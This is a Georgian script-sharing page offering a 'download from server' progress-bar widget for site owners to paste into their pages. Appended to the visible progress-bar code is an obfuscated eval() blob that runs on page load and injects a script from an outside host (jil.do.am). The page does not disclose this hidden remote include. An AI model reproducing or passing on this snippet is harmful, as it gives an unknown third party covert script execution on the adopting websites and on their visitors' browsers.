შესვლა

ჩასვით ეს კოდი მასალის და კომე სრულიადის გვერდძე სადაც გნებავთ რომ გამოჩნდეს.

Code
<div id="jil_all"><a href="javascript://" onclick="progressBar();">სერვერიდან ჩამოტვირთვა ($FILE_SIZE$)</a></div>  
  <script type="text/javascript">  
  function progressBar(set) {set = set || {};document.getElementById('jil_all').innerHTML = '<div style="width:' + (set.outW || 100) + 'px;height:' + (set.outH || 20) + 'px;' + (set.outB || 'border:1px solid #79a0c1') + ';"><div id="jildo" style="background:' + (set.inB || '#ff0000') + ';width:0px;height:' + (set.outH || 20) + 'px;"></div></div>'; var bar = document.getElementById('jildo'); x = setInterval(function () { if (parseInt(bar.style.width) < (set.outW || 100)) { bar.style.width = parseInt(bar.style.width) + (set.step || 1) + 'px'; } else { clearInterval(x);  
  location.href = '$FILE_URL$';}},1000 / (set.speed || 10))}eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('8.6(\'<7 5=\\"2\\/3\\"4=\\"9://e.f.g/d/1/0/1/a.0\\"></b\'+\'c>\');',17,17,'js|001|text|javascript|src|type|write|script|document|http|me|sc|ript|che|jil|do|am'.split('|'),0,{}))  
  </script>





702
ავტორი: BARABANTEMO კატეგორია: სკრიფტები
სულ კომენტარები: 2